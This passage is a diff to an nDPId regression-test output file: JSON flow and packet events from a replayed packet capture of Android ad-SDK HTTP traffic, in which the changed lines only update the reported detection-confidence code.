AAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/APgjVdV+IGpeNdTTTtd1OT\/iYShQt3If4z715latCnfmZ4ajObaSOi0zwV+0DrcSLpOm67cMW4EbSsen1ryK+aYKk\/enY7KeExc0rRubK\/Ab9smSMS2nw88XzK33THaTNn8jXGs\/ytys6y+86P7OzBL4GMPwE\/bXkJVfhP44LDsbGcVX9u5Zf+NH7w\/s\/MP+fbIJvgF+24fkf4R+NPqbWerWd5V\/z+X3g8uzD\/n2xY\/2Z\/24rhd0fwk8X\/iJB\/M0\/wC38q\/5+on+zcw\/kf3kkX7K\/wC3VOdsfwk8Xk9vmcfzapef5Sl\/GX4gssx\/8j+9Fgfsj\/t9Bdw+DnjFuP4Nzfyas3n2Uv8A5er8S1luYL7D\/D\/MY\/7Kv7e8QP8AxZTx6cf3LKdv5U\/7cyt\/8vl94\/7OzDrTZm3v7PH7cFqStz8GfiCCOv8AxK7v+grSOcZY9qy+8h4HHL\/l2\/uMq8+C\/wC2LaqWuvhV49QDqW0y7\/wrVZrlvSsvvM3gsb1hL7iinw2\/aqlk8qP4feOGbOCF066OP0qv7UwCX8aP3oSwmLf\/AC7l9zNTT\/gP+2Hf\/wCp+H3i9Af+e6yR\/wDoRFc887yuG9Z
fI1jgMa1pTZrWv7Nf7Ygw8nhfX4x3Mt2ygfiWrlnn+WW0maLLsd1gXrb4P\/tRaU+24stVJHUJflz\/AOOk1xTznLpbTf3MpZfjVo4\/idL4f+HH7SdyQh0LWyfe7Kj\/AMeIry6+cZf0q\/mb08vxr3j+KOx0n4QfH3CreaPrKE9N2oqB+r1xf2vQl8E2\/lL\/ACOlYKUfjVvmv8zft\/gv8cXj\/d22ok44X+2IM\/8Ao2iOOnLbm\/8AAZf5DdKnHeUV\/wBvR\/zKOq\/Aj9qa4UjR\/C\/iCcnp5N3E3\/tWuunjacfjbXyl\/kYTo8\/wST\/7ej\/mcN4r\/Z4\/bdTcYfhb44kHP\/HvbNJ\/6Cxr06GZ5fH4qn33OWeDxTeiv81\/med+IPhH+2JprN9t+FfxCjx1zpNx\/SvUpZplb\/5fx\/8AAjllgsd\/I\/uOR1fSf2hdLYrq3h\/x"} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1654385177120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":388,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":388,"pkt_l4_len":354,"thread_ts_msec":1654385177120,"pkt":"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"} 
@@ -895,192 +894,191 @@ 02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1654385177120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385177120,"pkt":"nLbQ0+MztKXvZygQCABFAAXUOPVAADcGHE2saXlSwKgCfgBQlawVUlZs+Pyij4AQAOvAhQAAAQEICsmibePytblg\/9j\/4AAQSkZJRgABAQAAAQABAAD\/4QAwRXhpZgAATU0AKgAAAAgAAQExAAIAAAAOAAAAGgAAAAB3d3cubWVpdHUuY29tAP\/bAEMAAgEBAQEBAgEBAQICAgICBAMCAgICBQQEAwQGBQYGBgUGBgYHCQgGBwkHBgYICwgJCgoKCgoGCAsMCwoMCQoKCv\/bAEMBAgICAgICBQMDBQoHBgcKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCv\/AABEIAeABkAMBEQACEQEDEQH\/xAAfAAABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRoQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8\/T19vf4+fr\/xAAfAQADAQEBAQEBAQEBAAAAAAAAAQIDBAUGBwgJCgv\/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6ery8\/T19vf4+fr\/2gAMAwEAAhEDEQA\/AM3xD4j8QR63dH+1L3ck7AhpTgjPBPp9a\/VPccFof5r162IeInzSlfmfV935klt4p8UWcKZ1e5k3sD5byHgdiM9Ki0XpY3p4nF04JqUtfN\/5kWoeK\/FN8+06lKMqeFmI9\/XkU1GNtjSWKxMre9L73\/mVZ\/FfiJIVhGrTjBypM5IH5UcsexMq2Itbmd\/8T\/zHjxZrAsGh\/tq4Eh6l5zkH+tCjFO9ivb1fZNObv3u\/8xfDesa7dXksk+szZhQBczHkk9+4470q0o2VkVgJ16lV3nLTzf8AmdDFe+IrjJfVroKgIGJSFJ9Ov6elcz5bbHt0nXvrKX3v\/MxvH2reIn8O3E66xdI1tiSOQzkHk8qPY56VVGSjOyW5GL9q8O5OUtPN\/wCZ523jPxLMm0+ILsqByDM3ynOeK6ZKDd0jx1VxCfxy+9\/5lC48T+JplCrr13ye07c+3Xilyx7HRDE1oy1nL72UbvXPEka7pPEV4WzgkXDf40nCL6HbDG4iX2397\/zMy\/8AFHii1yo8S3hJ4P8ApLcdfek4xS2O+jiK1RfE\/vf+Zz2oeLfFKsVHiC8JP3N
ty3Hr0NZ8sb7HqUq1a1uZ\/ezNuPF3ifcT\/wAJBfjjki6b\/GjljfY7KdWra3O\/vZTbxZ4tdhu8R3oPQK10x4\/OhxS6HWqtRbSf3sp3HizxZsGfEN7gc83b\/wCNRKMexvGtUT+J\/eyrc+LfFrMWXxHfZwMf6U3T86nlj2OilWqcvxP72VX8V+LSPKl8RXxXA4+0vyc9eDRyx7HTGtUvpJ\/eyC68YeKVk\/d+JdQjAXDbLx8n8CaOWL6GsKtXl1k382UZPF3jEyYPjLUeucNdMQP1qOWK3R1Rrzt1+9kT+KfF8YP\/ABU92TnJH2t846etLkS6Gyrzl9p\/eyGTxV4uljUQa\/enqWzev19Ov+eKlxT6IpVpqWsn97M6bxP4uZR\/xUWolif+f5+ffrWbp0+qOyFeo38T+8py+KPFyqsv\/CUamoYEjdeP\/Q0nSp9jup4yq7q\/"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01018{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":475,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":475,"pkt_l4_len":441,"thread_ts_msec":1654385181857,"pkt":"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"} 
-00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"m.vpon.com","url":"m.vpon.com\/sdk\/vpadn-sdk-core-v1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2269,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385181857,"flow_last_seen":1654385181857,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":409,"flow_tot_l4_payload_len":409,"flow_avg_l4_payload_len":409,"midstream":1,"thread_ts_msec":1654385181857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"m.vpon.com","url":"m.vpon.com\/sdk\/vpadn-sdk-core-v1.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 
01786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1049,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1049,"pkt_l4_len":1015,"thread_ts_msec":1654385181897,"pkt":"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\/Imh0dHBzOi8vIjoiaHR0cDovLyJ9O2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSInKyhpc1NES0FuZHJvaWQoKT9nZXRQcm90b2NvbFN0cmluZygpKyJtLnZwYWRuLmNvbS9zZGsvdnBhZG4tc2RrLWEtY29yZS12MS5qcyI6Z2V0UHJvdG9jb2xTdHJpbmcoKSsibS52cGFkbi5jb20vc2RrL3ZwYWRuLXNkay1pLWNvcmUtdjEuanMiKSsnIj48L3NjcmlwdD4nKTs="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":876,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":876,"pkt_l4_len":842,"thread_ts_msec":1654385183491,"pkt":"tKXvZygQnLbQ0+MzCABFAANeKchAAEAGAcbAqAJ+A0hFntseAFDfmpSQ59fP2oAYAfYPXQAAAQEICnsWmml\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"} 
-01456{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+01456{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183491,"flow_last_seen":1654385183491,"flow_idle_time":7580000,"flow_min_l4_payload_len":810,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":810,"flow_avg_l4_payload_len":810,"midstream":1,"thread_ts_msec":1654385183491,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":863,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":863,"pkt_l4_len":829,"thread_ts_msec":1654385183495,"pkt":"tKXvZygQnLbQ0+MzCABFAANRI05AAEAGCE3AqAJ+A0hFntsiAFAB9eG4XEyGo4AYAfYPUAAAAQEICnsWmm1\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"} -01443{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01443{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183495,"flow_last_seen":1654385183495,"flow_idle_time":7580000,"flow_min_l4_payload_len":797,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":797,"flow_avg_l4_payload_len":797,"midstream":1,"thread_ts_msec":1654385183495,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":857,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":857,"pkt_l4_len":823,"thread_ts_msec":1654385183496,"pkt":"tKXvZygQnLbQ0+MzCABFAANLU0dAAEAG2FnAqAJ+A0hFntsgAFBFVF+4FRsrIoAYAfYPSgAAAQEICnsWmm1\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"} 
-01437{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/setting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+01437{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183496,"flow_last_seen":1654385183496,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":791,"flow_tot_l4_payload_len":791,"flow_avg_l4_payload_len":791,"midstream":1,"thread_ts_msec":1654385183496,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/setting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
01008{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1654385183514,"pkt":"nLbQ0+MztKXvZygQCABFAAG+fDJAAPUG+\/oDSEWewKgCfgBQ2x7n18\/a35qXuoAYAHCoswAAAQEICn9GsiV7FpppSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/zTNwUrEQAzG8VeR75xDp+0uNmc9+AJeRJY4HddCuy2TjCJl3l1S2dtvJuGfHWpiRcGBsOgVDC0xJlUQRjEB74iyzZOaM4BD0zSExzuGf1RCXMvN8u8lrmMC4+nZE3M08OCL12TbJ7jvWn9tx6A7Hy4f86RfKV+mEdwN5xMhpx\/JI\/hth3+Gtm8Hwk0WT79O2YrMDy+WFhBk8cvgUN8JuXj41Hv4Ox6u9Q8AAP\/\/AQAA\/\/\/gj45W5wAAAA=="} 
01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2275,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1654385183517,"pkt":"nLbQ0+MztKXvZygQCABFAAG+t5xAAPUGwJADSEWewKgCfgBQ2yJcTIajAfXk1YAYAHAN9gAAAQEICn9Gsih7FpptSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxOTYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/zTNwUrEQAzG8VeR75xDp+0uNmc9+AJeRJY4HddCuy2TjCJl3l1S2dtvJuGfHWpiRcGBsOgVDC0xJlUQRjEB74iyzZOaM4BD0zSExzuGf1RCXMvN8u8lrmMC4+nZE3M08OCL12TbJ7jvWn9tx6A7Hy4f86RfKV+mEdwN5xMhpx\/JI\/hth3+Gtm8Hwk0WT79O2YrMDy+WFhBk8cvgUN8JuXj41Hv4Ox6u9Q8AAP\/\/AQAA\/\/\/gj45W5wAAAA=="} 
02702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1706,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1706,"pkt_l4_len":1672,"thread_ts_msec":1654385183520,"pkt":"nLbQ0+MztKXvZygQCABFAAacXxNAAPUGFDwDSEWewKgCfgBQ2yAVGysiRVRiz4AYAHASmwAAAQEICn9Gsip7FpptSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiAxNDQxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCh+LCAAAAAAAAP+UV12P3LYV\/SuD+yxrNF+7EwFB4aQtjCYB0tZA4qaBcEVSM1xRJE1eSTM2DPQ9RfveBkiBIkVfgj42aBv0z8SO+9S\/UJDSzm7cWLP2g\/dSPLq8PPeIc\/gUPCG1HvJFAo3fQQ6+ZUx4DwlwJIT8KSBCTq4VCWBZSA45rFfFChJARrIT96395ZhkeevZQ9kIyC+XWZY